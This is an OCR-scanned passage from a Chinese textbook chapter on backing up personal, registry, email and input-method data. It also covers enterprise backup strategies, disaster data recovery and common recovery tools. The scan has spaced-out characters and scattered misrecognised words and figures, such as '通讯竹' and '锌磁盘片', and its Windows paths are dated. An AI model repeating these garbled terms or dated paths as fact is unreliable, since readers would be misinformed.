这 些 个 人 数据 包含 了 用 户 的 很 多 心血 。 个 人 数据 的 重要 性 是 毋庸 置疑 的 ,因此 就 要 注意 养 
成 良好 习惯 ,定期 备份 重要 数据 。 

(1) 个 人 数据 集中 存放 。 进 行 硬盘 分 区 时 ,最 好 专门 留 出 一 个 逻辑 分 区 专门 存放 用 户 
的 个 人 数据 。 如 果 没 有 预 留 专门 的 分 区 ,至 少 应 该 专门 生成 一 个 子 目录 来 存放 个 人 的 重要 
数据 ,包括 用 户 的 文档 , 源 代码 、 重 要 数据 等 均 存 储 在 这 里 。 切 尽 因 为 懒惰 而 把 个 人 重要 数 
据 存放 在 默认 位 置 。 

(2) 经 常备 份 这 些 数据 。 当 用 户 的 个 人 数据 集中 存放 后 ,还 要 经 常备 份 个 人 数据 。 如 
果 不 按 “ 个 人 数据 集中 存放 ”的 要 求 去 做 ,用 户 会 发 现 备 份 个 人 数据 非常 困难 ,因为 用 户 要 到 
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处 查找 需要 备份 的 文档 、 源 代码 等 重要 数据 。 备 份 个 人 数据 的 途径 有 多 种 ,如 备份 到 USB 
硬盘 ,USB 闪存 等 ; 备份 到 文件 服务 器 .FTP 服务 器 等 ; 备份 到 光盘 ,这 需要 刻录 机 支持 ; 
对 于 占用 空间 不 大 的 个 人 数据 ,还 可 以 备份 到 E-mail 服务 器 上 ,这 是 个 非常 方便 的 备份 

2) 备份 系统 重要 数据 

硬盘 的 分 区 表 、 主 引导 区 、 引 导 区 等 重要 区 域 的 数据 ,关系 着 整个 系统 的 安危 。 一旦 这 
些 数据 章 到 破坏 ,整个 系统 将 瘫 疾 , 因 此 需要 备份 这 些 数据 ,以 备 不 时 之 用 。 

备份 系统 重要 数据 的 途径 主要 是 依靠 工具 ,它们 包括 : Windows 自 带 的 Dskprobe. 
exe, 该 程序 位 于 Windows 安装 光盘 里 的 \Support\ Tools 目录 下 ; 第 三 方 备 份 工具 , 如 
EasyGhost、Dist Genius 等 。 此 外 ,杀毒 软件 也 都 有 备份 系统 重要 数据 的 功能 。 

3) 注册 表 的 备份 

注册 表 是 微软 操作 系统 用 来 保存 硬件 配置 与 软件 设置 的 中 央 数 据 库 , 它 对 系统 及 其 中 
的 软件 的 正常 运行 起 着 至 关 重 要 的 作用 。 由 于 应 用 程序 和 硬件 配置 经 常会 更 改 注 册 表 , 因 
此 注册 表 很 容易 出 错 或 损坏 。 所 以 ,在 注册 表 完 好 时 对 其 备份 是 非常 必要 的 。 虽 然 在 多 辑 
上 注册 表 是 一 个 数据 库 , 但 为 了 管理 和 使 用 的 方便 性 ,操作 系统 把 它 分 为 两 个 文件 : USER. 
DAT 和 SYSTEM. DAT。 注 册 表 备份 的 方法 包括 以 下 内 容 。 

(1) Windows 自动 备份 : USER. DAT 自动 备份 为 USER. DAO,SYSTEM. DAT 自动 
备份 为 SYSTEM. DAO。 

(2) Windows 系统 备份 : 在 C:\WINDOWS\SYSBCKUP 目录 中 以 CAB 文件 格式 备 
份 最 近 5 天 的 系统 文件 。 其 备份 文件 名 分 别 是 rb000. cab、rb001. cab、rb002. cab、rb003. 
cab 和 rb005. cab。 其 中 ,包括 User. dat、System. dat、System. ini 和 Win. ini 等 系统 文件 。 
使 用 Windows 自 带 的 Scanreg. exe 命令 能 够 从 CAB 文件 中 提取 出 相应 的 系统 文件 。 

(3) 手工 备份 : 最 方便 的 方法 就 是 使 用 Regedit 命令 启动 注册 表 管 理 窗口 ,然后 用 导出 
注册 表 功 能 备份 。 当 然 , 也 可 以 直接 对 注册 表 的 两 个 文件 进行 纯 手工 备份 。 

4) Outlook 数据 的 备份 

Outlook 里 有 大 量 的 邮件 和 联系 人 列表 ,其 中 有 一 些 对 用 户 至 关 重要 。 如 果 想 完整 的 
备份 Ooutlook 数据 ,用 户 需要 备份 相应 的 注册 表 表 项 、 备 份 相应 的 数据 文件 等 。 具 体内 容 
包括 以 下 几 方 面 。 

首先 ,备份 注册 表 表 项 。 注 册 表 表 项 “Hkey-current-user\Software\Microsoft\Internet 
AccountManager\Accounts” 中 分 别 有 : 00000001 和 0000000a 等 多 个 子 键 (取决 于 邮箱 与 
新 闻 组 的 多 少 ) .它们 分 别 代 表 用 户 的 邮箱 与 新 闻 组 。 因 此 ,需要 将 accounts 主键 下 的 各 子 
键 的 注册 表 导 出 并 备份 。 

其 次 , 备份 重要 文件 。 备份 Windows 安装 目录 下 的 application data/microsoft/ 
outlook 目录 里 的 所 有 信息 ,如 果 用 户 的 Windows 是 多 用 户 设 置 , 则 需 备份 Windows\ 
profiles 目录 里 的 相应 信息 。 

最 后 ,备份 通讯 竹 。 备 份 通讯 德 的 步骤 是 : 在 通讯 短 中 单 击 “文件 ? 莱 单 ,选择 "导出 ? 选 
项 ,然后 选择 “通讯 短 ? 选 项 ,最 后 程序 会 提示 选择 何 种 导出 格式 进行 备份 。 在 没有 特殊 需要 
的 情况 下 ,用 户 可 以 采用 默认 的 格式 进行 备份 。 
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5) Foxmail 数据 的 备份 

Foxmail 是 目前 最 受 欢 迎 的 电子 邮件 客户 端 工具 软件 之 一 , 它 的 邮件 备份 比 Outlook 
简单 。Foxmail 软件 会 在 其 安装 目录 下 自动 建立 一 个 名 为 Mail 的 子 目录 ,该 子 目录 里 存放 
有 用 户 收 到 的 邮件 和 发 出 的 邮件 。 用 户 只 需 将 Mail 目录 保存 好 就 可 完成 备份 工作 。 

6) 输入 法 自学 习 数 据 的 备份 

输入 法 的 自学 习 数 据 的 备份 是 最 易 被 用 户 忽视 的 。 最 重要 的 是 ,大 多 数 用 户 并 不 知道 
为 什么 要 备份 输入 法 信息 ,或 者 备份 输入 法 的 什么 内 容 。 其 实 , 几 乎 所 有 的 输入 法 都 有 自学 
习 和 自 定义 功能 。 经 过 用 户 的 长 期 使 用 后 .输入 法 的 自学 习 和 自 定义 功能 能 够 提高 用 户 的 
输入 速度 和 准确 度 。 因 此 ,用 户 需 要 备份 输入 法 的 这 些 信息 。 

(1) 备份 五 笔 输 入 法 的 自 定义 词组 。 五 笔 输入 是 最 具 影 响 的 中 文 输入 法 之 一 。 五 笔 输 
入 法 的 自 定义 词组 保存 在 C:\Windows\System\wbx. emb 文件 中 ,因此 ,用 户 在 删除 或 重 
装 Windows 系统 之 前 , 须 将 wbx. emb 文件 保存 好 。 

(2) 备份 智能 拼音 输入 法 的 自 定义 词组 。 智 能 拼音 输入 法 是 最 适合 普通 用 户 使 用 的 输 
入 法 之 一 , 它 除了 能 自 定义 词组 外 还 能 自动 记忆 用 户 输入 的 词组 。 其 自 定义 词组 保存 在 
C:\WINDOWS\SYSTEM\tmmr. rem 文件 中 ,因此 ,用 户 在 删除 或 重 装 Windows 系统 之 
前 , 须 将 tmmr. rem 文件 保存 好 。 

(3) 备份 微软 拼音 输入 法 的 自 定义 词组 。 微 软 拼 音 输入 法 在 国内 拥有 庞大 的 用 户 群 ， 
能 输入 繁体 汉字 是 它 最 大 的 特点 。 该 输入 法 也 具有 造 词 功能 , 它 所 有 的 自 定义 词组 全 部 保 
存在 pjyyp. upt 文件 中 (路 径 为 C:\Windows\System)。 因 此 ,用 户 在 删除 或 重 装 Windows 
系统 之 前 , 须 备份 该 文件 。 

7) 浏览 器 收藏 夹 的 备份 

浏览 器 收藏 夹 内 保存 有 用 户 存储 的 有 用 的 上 网 地 址 ,这 对 于 经 常 上 网 的 用 户 肯 定 是 很 
重要 的 数据 。 现 在 有 形形色色 的 浏览 器 ,如 IE、FireFox、Mozilla 等 。 在 格式 化 C 盘 或 重 装 
Windows 系统 前 ,一定 要 先 备 份 各 个 浏览 器 收藏 夹 中 的 数据 。 备 份 IE 收藏 夹 的 操作 非常 
简单 , 即 进入 C:\Windows\Favorites 文件 夹 ,将 该 文件 夹 中 的 文件 全 部 备份 即 可 。 

2. 系统 级 备份 策略 

随 着 国际 互联 网 和 信息 化 的 发 展 ,企业 的 服务 器 运行 着 企业 的 关键 应 用 ,存储 着 重要 的 
数据 和 信息 ,为 决策 部 门 提供 了 多 种 信息 服务 ,为 网 络 环境 下 的 大 量 客户 机 提供 快速 、 高 效 
的 信息 处 理 和 网 络 访问 等 的 重要 服务 。 因 此 ,建立 可 靠 的 系统 级 数据 备份 系统 ,保护 关键 数 
据 的 安全 是 企业 当前 的 重要 任务 之 一 。 系 统 级 备份 可 以 在 发 生 数据 灾难 时 ,保证 数据 少 丢 
失 或 者 不 丢失 ,最 大 程度 地 减少 企业 的 损失 。 

1) 导致 数据 丢失 的 原因 

IT 网 络 技术 在 信息 的 收集 、 存 储 、 处 理 、 传 输 ,分 发 过 程 中 扮演 着 重要 的 角色 ,提高 了 企 
业 的 日 常 工作 效率 。 随 之 也 带 来 了 一 些 新 的 问题 ,其 中 最 值得 关注 的 就 是 系统 错误 乃至 数 
据 丢 失 。 对 数据 的 安全 带 来 威胁 的 原因 有 以 下 几 个 方面 。 

(1) 黑客 攻击 : 黑客 侵入 并 破坏 计算 机 系统 ,导致 数据 丢失 。 

(2) 恶意 代码 : 木马 ,病毒 等 恶意 代码 感染 计算 机 系统 ,损坏 数据 。 

(3) 硬盘 损坏 : 电源 浪 涌 、 电 磁 干 扰 都 可 能 损坏 硬盘 ,导致 文件 和 数据 的 丢失 。 

(4) 人 为 错误 : 人 为 删除 文件 或 格式 化 磁盘 。 
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(5) 自然 灾害 : 火灾 洪水 或 地 震 等 灾害 毁灭 计算 机 系统 ,导致 数据 丢失 。 

2) 备份 的 策略 

数据 备份 就 是 使 用 成 本 低廉 的 存储 介质 ,定期 将 重要 数据 保存 下 来 ,以 保证 数据 意外 丢 
失 时 能 尽快 恢复 ,使 用 户 的 损失 降 到 最 低 。 常 用 的 存储 介质 类 型 有 磁盘 、 磁 带 、 光 盘 、 网 络 备 
份 等 。 磁 带 经 常用 在 大 容量 的 数据 备份 领域 ,而 网 络 备份 是 当前 最 流行 的 备份 技术 。 建 立 
完整 的 网 络 数据 备份 系统 必须 考虑 以 下 内 容 。 

(1) 数据 备份 的 自动 化 ,减少 系统 管理 员 的 工作 量 。 

(2) 数据 备份 工作 制度 化 、 科 学 化 。 

(3) 介质 管理 的 有 效 化 ,防止 读 写 操作 的 错误 。 

(4) 分 门 别 类 的 介质 存储 ,使 数据 的 保存 更 细致 .科学 。 

(5) 介质 的 清洗 轮转 ,提高 介质 的 安全 性 和 使 用 寿命 。 

(6) 以 备份 服务 器 为 中 心 ,对 各 种 平台 的 应 用 系统 及 其 他 信息 数据 进行 集中 的 备份 。 

(7) 维护 人 员 能 够 容易 地 恢复 损坏 的 文件 系统 和 各 类 数据 。 

3) 备份 管理 软件 

数据 库 是 企业 信息 的 集中 存放 地 , 它 是 数据 备份 的 核心 。 市 场 上 流行 数据 库 管 理 系统 
(如 Oracle、SQL Server 等 ) 都 带 备份 工具 .但 它们 都 不 能 实现 自动 备份 。 也 就 是 说 ,利用 数 
据 库 管理 系统 本 身 的 备份 工具 远 远 达 不 到 客户 的 要 求 , 必 须 使 用 具有 自动 加 载 功 能 的 磁带 
库 硬 件 产品 与 数据 库 在 线 备 份 功能 的 自动 备份 软件 。 目 前 ,流行 的 备份 软件 有 多 种 ,如 CA 
ARCserve、Veritas NetBackup、 HP OpenView Omniback [| 、Legato NetWorker 及 IBM 
ADSM 等 。 各 软件 在 备份 管理 的 方式 上 互 有 优 缺 点 。 它 们 都 具有 自动 定时 备份 管理 .备份 
介质 自动 管理 数据库 在 线 备份 管理 等 功能 。 其 中 ,CA 、Legato 和 Veritas 是 独立 软件 开发 
商 开发 的 产品 ,更 注重 于 对 多 种 操作 系统 和 数据 库 平台 的 支持 ,而 HP 和 IBM 等 更 注重 于 
对 本 公司 软 /硬件 产品 的 支持 。 

4) 存储 备份 技术 

存储 备份 技术 可 以 确定 需 备份 的 内 容 、 备 份 时 间 及 备份 方式 。 各 个 企业 要 根据 自己 的 
实际 情况 来 选择 不 同 的 备份 技术 。 目 前 被 采用 最 多 的 备份 技术 主要 有 以 下 3 种 。 

(1) 完全 备份 。 完 全 备份 (Full Backup) 是 指 对 整个 系统 或 用 户 指定 的 所 有 文件 进行 一 
次 全 面 的 备份 。 这 是 最 基本 也 是 最 简单 的 备份 方式 ,这 种 备份 方式 的 好 处 就 是 很 直观 ,容易 
被 人 理解 。 如 果 在 备份 间隔 期 间 出 现 数据 丢失 等 问题 ,可 以 只 使 用 一 份 备份 文件 快速 地 恢 
复 所 丢失 的 数据 。 但 是 它 有 很 明显 的 缺点 : 需要 备份 所 有 的 数据 ,并 且 每 次 备份 的 工作 量 
也 很 大 ,需要 大 量 的 备份 介质 。 如 果 完 全 备份 进行 得 比较 频繁 ,在 备份 设备 中 就 有 大 量 的 数 
据 是 重复 的 。 这 些 重复 的 数据 占用 了 大 量 空间 ,这 对 用 户 来 说 就 意味 着 增加 成 本 。 而 且 如 
果 需 要 备份 的 数据 量 相当 大 ,备份 数据 时 进行 读 写 操作 所 需 的 时 间 也 会 较 长 。 因 此 这 种 备 
份 不 能 进行 得 太 频 繁 ,只 能 每 隔 一 段 较 长 时 间 才 进行 一 次 完整 的 备份 。 但 是 这 样 一 旦 发 生 
数据 丢失 ,只 能 使 用 上 一 次 的 备份 数据 恢复 到 前 次 备份 时 的 数据 状况 ,这 期 间 内 更 新 的 数据 
就 有 可 能 丢失 。 

(2) 增 量 备份 。 为 了 克服 完全 备份 的 缺点 ,提出 了 增 量 备份 (Incremental Backup) 技 
术 。 增 量 备份 只 备份 上 一 次 备份 操作 以 来 新 创建 或 者 更 新 的 数据 。 因 为 在 特定 的 时 间 段 内 
只 有 少量 的 文件 发 生 改 变 , 没 有 重复 的 备份 数据 , 既 节省 了 空间 ,又 缩短 了 时 间 。 因 而 这 种 
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小 


备份 方法 比较 经 济 ,可 以 频繁 进行 。 典 型 的 增 量 备份 方案 是 在 长 时 间 间 隔 的 完全 备份 之 间 ， 
频繁 地 进行 增 量 备份 。 增 量 备份 的 缺点 是 : 当 发 生 数据 丢失 时 ,恢复 工作 会 比较 麻烦 。 

(3) 差分 备份 。 差 分 备份 (Differential Backup) 即 备份 上 一 次 完全 备份 后 产生 和 更 新 
的 所 有 数据 。 它 的 主要 目的 是 将 完成 恢复 时 涉及 的 备份 记录 数量 限制 在 两 个 ,以 简化 恢复 
的 复杂 性 。 差 分 备份 的 优点 是 : 首先 ,无 须 频繁 地 做 完全 备份 ,工作 量 小 于 完全 备份 ; 其 
次 ,灾难 恢复 相对 简单 。 系 统管 理 员 只 需要 对 两 份 备份 文件 进行 恢复 , 即 完 全 备份 的 文件 和 
灾难 发 生前 最 近 的 一 次 差分 备份 文件 ,就 可 以 将 系统 恢复 。 

增 量 备份 和 差分 备份 都 能 以 比较 经 济 的 方式 对 系统 进行 备份 ,这 两 种 方法 的 备份 方法 
都 是 依赖 于 时 间 ,或 者 是 基于 上 一 次 备份 ( 增 量 ) ,或 者 基于 上 一 次 完全 备份 。 表 10-2 对 3 
种 备份 方案 的 特点 进行 了 比较 。 

表 10-2 备份 方案 的 比较 


完全 备份 增 量 备份 差分 备份 
空间 使 用 最 多 最 少 少 于 完全 备份 
备份 速度 最 慢 最 快 快 于 完全 备份 
恢复 速度 最 快 最 慢 快 于 增 量 备份 


在 实际 应 用 中 ,通常 会 结合 上 述 3 种 方案 的 优点 ,混合 使 用 。 例 如 ,每 小 时 进行 一 次 增 
量 备 份 或 差分 备份 ,每 天 进行 一 次 完全 备份 。 


10. 8.2 数据 恢复 


所 谓 数据 恢复 ,是 指 当 系统 发 生 故障 时 ,恢复 到 原 有 状态 的 过 程 。 根 据 有 无 数据 备份 ， 
数据 恢复 可 以 分 为 正常 数据 恢复 和 灾难 数据 恢复 。 正 常数 据 恢复 是 具有 数据 备份 的 数据 恢 
复 ,其 恢复 过 程 非常 简单 ,这 里 不 再 讲述 。 下 面 将 重点 介绍 灾难 数据 恢复 。 

在 存储 设备 发 生 故 障 或 遭遇 意外 灾难 造成 数据 丢失 时 ,通过 相应 的 数据 恢复 技术 找 
丢失 数据 ,降低 灾难 损失 的 过 程 称 为 灾难 数据 恢复 。 由 恶意 代码 攻击 、 误 分 区 . 误 格 式 化 等 
造成 的 数据 丢失 属于 软 损坏 ,仍然 有 可 能 使 用 第 三 方 软件 来 恢复 。 硬 损坏 是 由 于 物理 损失 
造成 的 ,如 盘面 划 伤 、 磁 头 撞 毁 .芯片 及 其 他 元 器 件 烧 坏 等 造成 的 损失 。 硬 损坏 需要 在 专业 
人 员 的 指导 下 修复 。 

在 当今 这 样 一 个 信息 化 和 网 络 化 的 社会 里 ,计算 机 正在 人 们 的 工作 和 生活 中 扮演 着 日 
益 重 要 的 角色 。 越 来 越 多 的 企业 、 商 家 、 政 府 机 关 和 个 人 通过 计算 机 来 处 理 信息 ,同时 将 各 
种 信息 以 数据 文件 的 形式 保存 在 计算 机 中 。 一 旦 重要 的 数据 丢失 ,将 会 带 来 严重 的 后 果 。 

在 大 多 数 情况 下 ,用 户 找 不 到 的 数据 往往 并 没有 真正 丢失 ,只 要 处 理 得 当 , 恢 复 是 完全 
有 可 能 的 。 即 使 数据 被 删除 或 硬盘 出 现 故 障 , 只 要 在 介质 没有 严重 受 损 的 情况 下 ,数据 就 有 
可 能 被 完好 无 损 地 恢复 。 在 格式 化 或 误 删除 引起 的 数据 损失 的 情况 下 ,大 部 分 数据 仍 未 损 
坏 , 用 软件 重新 恢复 后 ,可 以 重读 数据 。 如 果 硬 盘 因 硬件 损坏 而 无 法 访问 ,更 换 发 生 故障 的 
零件 , 即 可 恢复 数据 。 在 介质 严重 受 损 或 数据 被 覆盖 情况 下 ,数据 将 无 法 恢复 。 

1. 数据 可 恢复 的 前 提 

实践 证 明 ,并 不 是 一 切 丢失 的 数据 都 可 以 恢复 过 来 ,否则 ,就 不 能 称 为 数据 灾难 了 。 如 
果 被 删除 的 文件 所 在 的 物理 位 置 (存储 空间 ) 已 经 被 其 他 文件 取代 ,或 者 文件 数据 占用 的 磁 
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盘 空 间 已 经 分 配给 其 他 文件 且 已 经 被 填充 数据 ,那么 该 文件 就 不 可 能 再 复原 了 。 电 子 碎 纸 
机 就 是 利用 这 种 原理 来 设计 的 。 当 然 , 对 于 硬 损坏 而 言 , 如 果 硬 件 或 存储 介质 损坏 得 非常 严 
重 , 并 且 没 有 宛 余 信息 存在 ,也 是 不 可 能 恢复 的 。 

2. 出 现 数据 灾难 时 如 何 处 理 

一 旦 出 现 了 数据 灾难 事件 ,用 户 也 不 用 太 担心 ,只 要 采用 适当 的 处 理 方式 ,灾难 数据 基 
本 能 够 复原 。 根 据 调 查 显示 ,数据 损坏 大 多 是 可 以 部 分 或 全 部 恢复 的 ,在 不 能 恢复 实际 案例 
中 ,90% 以 上 是 由 于 用 户 使 用 了 错误 的 恢复 工具 或 恢复 方法 所 造成 的 。 

如 果 是 由 恶意 代码 攻击 \ 误 分 区 \ 误 格式 化 等 原因 造成 的 数据 丢失 ,这 将 关系 到 整个 硬 
盘 数 据 的 存亡 。 在 发 生硬 盘 数 据 丢 失事 件 后 ,首先 应 该 立即 关机 , 拔 下 硬盘 ,不 要 再 对 硬盘 
进行 写 操作 ,避免 数据 进一步 丢失 是 当务之急 。 最 好 用 Ghost 的 TrackBYTrack 方式 对 硬 
盘 做 一 个 备份 ,用 备份 盘 尝 试 各 种 数据 恢复 。 所 有 对 硬盘 的 修复 操作 都 应 该 是 可 逆 的 或 者 
只 读 的 ,不 能 盲目 地 自行 采用 第 三 方 工具 进行 修复 操作 ,以 免 造 成 无 法 挽回 的 损失 。 然 后 ， 
尽快 找 专业 人 员 进 行 咨询 并 采用 合适 的 方式 处 理 。 

3. 低 难 度数 据 恢 复 

有 些 故 障 是 非常 简单 的 ,对 于 精通 计算 机 的 用 户 来 说 ,完全 可 以 自己 设法 处 理 。 低 难度 
的 可 恢复 故障 包括 以 下 几 种 。 

(1) 硬盘 故障 嫌疑 。 首 先 检查 信号 线 和 电源 线 是 否 插 好 ,如 果 故 障 仍 不 能 恢复 , 则 需要 
将 硬盘 挂 到 另 一 台 正常 计算 机 上 进行 测试 。 在 另 一 台 计 算 机 上 用 BIOS 的 硬盘 检测 功能 进 
行 检测 ,如 果 还 是 无 法 检测 到 该 硬盘 ,就 肯定 是 硬件 故障 。 

(2) 分 区 损坏 嫌疑 。 用 户 可 以 用 Windows 操作 系统 自 带 的 FDISK 等 工具 进行 检测 ， 
如 果 无 任何 分 区 信息 显示 , 则 说 明 磁盘 分 区 已 被 破坏 。 

(3) 硬盘 电路 板 故障 嫌疑 。 可 以 找 一 块 型 号 完全 相同 的 好 硬盘 ,并 更 换 其 电路 板 进行 
测试 。 如 果 成 功 则 说 明 无 故障 ; 否则 ,说 明 有 故障 。 

(4) 误 格式 化 \ 误 删除 故障 。 将 该 硬盘 连接 到 另 一 台 正 常 的 计算 机 上 作为 辅助 硬盘 , 然 
后 采用 EasyRecovery 等 第 三 方 数据 恢复 工具 进行 故障 修复 。 

如 果 上 述 方法 不 能 诊断 或 修复 这 些 故障 , 则 说 明 损 坏 情况 比较 严重 ,不 能 青 由 非 专 业 人 
员 处 理 , 应 该 尽快 送 给 专业 人 员 处 理 。 

4. 高 难度 数据 恢复 

高 难度 的 数据 恢复 需要 专业 人 员 来 处 置 。 常 见 的 高 难度 数据 恢复 情况 有 如 下 几 种 。 

(1) 硬盘 分 区 表 损 坏 。 硬 盘 分 区 表 被 破坏 的 情况 ,是 数据 损坏 中 除 物 理 损坏 之 外 最 严 
重 的 一 种 灾难 性 破坏 。 导 致 硬盘 分 区 表 损 坏 的 原因 主要 包括 : 四 误 操作 删除 分 区 ,这 种 情 
况 下 ,只 要 没有 进行 其 他 额外 的 操作 完全 可 以 恢复 ; 加 安装 多 系统 引导 软件 或 者 采用 第 三 
方 分 区 工具 导致 分 区 混乱 ,这 种 情况 具有 恢复 的 可 能 性 ; @ 恶 意 代 码 攻击 破坏 分 区 ,这 种 原 
因 也 可 以 部 分 或 者 全 部 恢复 ; @Ghost 工具 破坏 分 区 ,这 种 一 般 可 以 部 分 恢复 。 

(2) 硬盘 坏 扁 区 。 硬 盘 用 久 了 ,出 现 “ 坏 道 " 是 最 常见 的 故障 。 硬 盘 坏 道 一 般 分 为 逻辑 
坏 道 和 物理 坏 道 。 逻 辑 坏 道 是 由 软件 操作 或 使 用 不 当 造 成 的 ,可 以 用 软件 进行 修复 。 物 理 
坏 道 是 真正 的 物理 性 坏 道 , 它 是 由 于 硬盘 磁道 上 产生 的 物理 损伤 造成 的 。 物 理 坏 道 只 能 通 
过 修改 硬盘 分 区 或 扇 区 的 使 用 情况 来 解决 。 硬 盘 有 坏 道 特征 如 下 。 
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Q@ 在 操作 某 个 文件 时 ,硬盘 出 现 操作 速度 变 慢 、 长 时 间 操 作 不 成 功 、 长 时 间 读 某 一 区 
域 .硬盘 异 响 等 现象 ,以 及 操作 系统 提示 “无 法 读 取 或 写 入 某 个 文件 ”等 信息 ,这 些 都 表明 硬 
盘 可 能 出 现 了 坏 道 。 

@ Scandisk 程序 在 开机 时 自动 运行 。 这 种 现象 说 明 硬盘 上 有 需要 修复 的 重要 错误 (如 
坏 道 灯 )。 该 程序 如 果 不 能 成 功 检测 硬盘 , 则 硬盘 肯定 有 坏 道 。 

@ 硬盘 无 法 启动 。 用 其 他 途径 启动 后 ,看 不 到 硬盘 盘 符 ,或 者 盘 符 可 见 但 无 法 对 该 区 
进行 操作 ,这 些 现象 都 表明 硬盘 上 可 能 出 现 了 坏 道 。 

(3) 磁头 损坏 。 硬 盘 发 展 的 趋势 是 越 来 越 多 的 数据 被 储存 在 越 来 越 小 的 空间 里 。 
20 年 前 ,硬盘 只 能 储存 MB 级 的 数据 ,而 现在 的 硬盘 可 以 在 比 20 年 前 更 小 的 空间 上 存储 
TB 级 的 数据 。 硬 盘 储 存 数据 量 的 扩大 增加 了 数据 损失 的 概率 。 当 更 多 的 数据 存 进 更 小 、 
更 紧密 的 空间 时 ,机械 的 精密 度 就 变 得 非常 重要 。 一 个 轻 轻 的 推动 ,电压 激增 都 可 能 使 磁头 
碰撞 到 盘 片 ,从 而 造成 磁头 和 盘 片 的 损坏 。 一 般 情况 下 , 盘 片上 被 磁头 碰 到 的 地 方 ,数据 会 
永久 丢失 。 

(4) 盘 片 损伤 。1968 年 ,IBM 提出 了 Winchester( 温 盘 ) 技 术 , 这 是 现代 绝 大 多 数 硬盘 
的 原型 。 温 盘 使 用 密封 .固定 并 高 速 旋转 的 锌 磁盘 片 ,磁头 沿 盘 片 径 向 移动 并 且 悬 浮 在 高 速 
转动 的 盘 片上 方 ,但 不 与 盘 片 直接 接触 。1973 年 ,IBM 制造 出 了 第 一 块 采用 温 盘 技术 的 
硬盘 。 

早期 的 盘 片 都 是 使 用 塑料 材料 作为 盘 片 基质 ,然后 再 在 塑料 基质 上 涂 上 磁性 材料 构成 。 
市 场 上 的 IDE 硬盘 几乎 都 是 使 用 铝 质 基质 ,而 采用 玻璃 材料 作为 盘 片 基 质 则 是 较 新 的 硬盘 
盘 片 技术 。 玻 璃 材料 能 使 硬盘 具有 平滑 性 及 更 高 的 坚固 性 ,以 及 更 高 的 稳定 性 。 大 部 分 影 
响 硬盘 的 精度 是 1 一 2 微 二 (灰尘 是 4 一 8 微 寸 , 人 类 的 头发 是 10 微 寸 )。 对 如 此 精密 的 盘 片 
而 言 , 任 何 微小 的 动作 都 可 能 造成 无 可 挽回 的 损伤 。 


10. 8.3 数据 恢复 工具 


目前 ,市 场 上 已 经 有 很 多 非常 成 功 的 数据 恢复 工具 ,并 在 实际 工作 中 给 用 户 带 来 了 便 
利 。 但 如 果 使 用 不 当 , 数 据 修复 工具 也 有 可 能 会 破坏 用 户 数据 。 所 以 在 使 用 这 些 工具 之 前 ， 
最 好 先 认真 学 习 或 咨询 专业 公司 。 下 面 介绍 几 款 常见 的 数据 恢复 工具 。 

1. EasyRecovery 


EasyRecoveryQ 是 由 美国 数据 厂商 Kroll Ontrack 出 品 的 一 款 数据 文件 恢复 软件 。 它 
可 以 恢复 各 种 存储 介质 的 数据 ,包括 硬盘 、 光 盘 、U 盘 / 移 动 硬盘 、 数 码 相 机 、 手 机 、RAID 系 
统 等 。 除 Windows 系统 外 , 它 还 支持 使 用 FAT、NTFS、HFS、EXTISO9660 分 区 的 文件 系 
统 的 Mac 数据 恢复 ,可 以 恢复 Mac 下 丢失 、 误 删 的 文件 。EasyRecovery 支持 几乎 所 有 文件 
类 型 的 数据 恢复 ,包括 图 像 、 视 频 、 音 频 、 应 用 程序 ,办公 文档 、 文 本 文档 及 定制 。 能 够 识别 多 
达 259 种 文件 扩展 名 ,还 可 设 定 文件 的 过 滤 规 则 ,快速 恢复 数据 。 

EasyRecovery 除 免费 版 外 ,还 有 个 人 版 (EasyRecovery Home)、 专 业 版 (EasyRecovery 
Professional) ,企业 版 (EasyRecovery Technician) 等 多 种 版 本 。 


轩 https://www. krollontrack. com/products/data-recovery-software/ 。 
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2. FinalData 


FinalData? 是 由 美国 FinalData 公司 推出 的 数据 恢复 软件 。 该 软件 具有 功能 强大 、 操 
作 简单 .快速 高 效 和 覆盖 面 广 等 鲜明 特点 ,可 以 为 数据 文件 提供 强 有 力 的 安全 保障 。 

因为 FinalData 可 以 通过 扫描 整个 磁盘 来 进行 文件 查找 和 恢复 , 它 不 依赖 目录 入 口 和 
FAT 表 记 录 的 信息 ,所 以 它 既 可 以 恢复 被 删除 的 文件 ,还 可 以 在 整个 目录 入 口 和 FAT 表 都 
遭 到 破坏 的 情况 下 进行 数据 恢复 ,甚至 在 磁盘 引导 区 被 破坏 、 分 区 全 部 信息 丢失 (如 硬盘 被 
重新 分 区 或 者 格式 化 ) 的 情况 下 进行 数据 恢复 。 大 家 知道 ,病毒 和 黑客 通常 是 选择 磁盘 引导 
区 、 分 区 信息 和 目录 入 口 .FAT 等 进行 攻击 的 ,因为 这 样 只 需 破坏 掉 少量 的 关键 信息 就 可 以 
造成 大 量 的 数据 文件 甚至 使 整个 磁盘 都 变 得 不 可 用 ,同时 错误 的 重新 分 区 和 格式 化 则 是 危 
害 最 大 的 误 操作 ,但 是 通过 FinalData 的 强大 恢复 功能 ,就 能 够 帮助 用 户 从 数据 灾难 中 轻松 
摆脱 出 来 。 

目前 ,FinalData 提供 标准 版 .企业 版 和 企业 网 络 版 3 个 版 本 。 

3. DiskGenius 


DiskGenius@ 原名 DiskMan, 是 由 易 数 科技 推出 的 一 款 国 人 自主 开发 的 , 集 数 据 恢复 、 
磁盘 分 区 管理 ,系统 备份 与 还 原 功能 于 一 身 的 软件 工具 。 

DiskGenius 支持 多 种 情况 下 的 文件 丢失 、 分 区 丢失 恢复 ; 支持 文件 预览 ; 支持 扇 区 编 
辑 、.RAID 恢复 等 高 级 数据 恢复 功能 。 其 提供 的 分 区 管理 功能 包括 创建 分 区 、 删 除 分 区 、 格 
式 化 分 区 无 损 调整 分 区 、 隐 藏 分 区 ,分配 盘 符 或 删除 盘 符 等 。 其 提供 的 系统 备份 与 还 原 功 
能 包括 分 区 表 (MBR 或 GPT) 备 份 及 恢复 、 分 区 复制 磁盘 复制 等 。DiskGenius 还 提供 了 快 
速 分 区 ,整数 分 区 、 分 区 表 错 误 检 查 与 修复 、 坏 道 检 测 与 修复 .永久 删除 文件 .虚拟 硬盘 与 动 
态 磁 盘 等 其 他 功能 。 

DiskGenius 有 免费 版 ,标准 版 与 专业 版 3 个 版 本 。3 个 版 本 共用 同一 个 发 行 包 。 下 载 
后 , 即 可 立即 使 用 免费 版 DiskGenius; 注册 后 ,可 自动 升级 为 标准 版 或 专业 版 。DiskGenius 
的 英文 版 本 名 为 PartitionGuru。 

易 数 科技 还 提供 一 款 面 向 普通 用 户 的 数据 恢复 专用 软件 一 一 数据 恢复 精灵 。 它 基于 
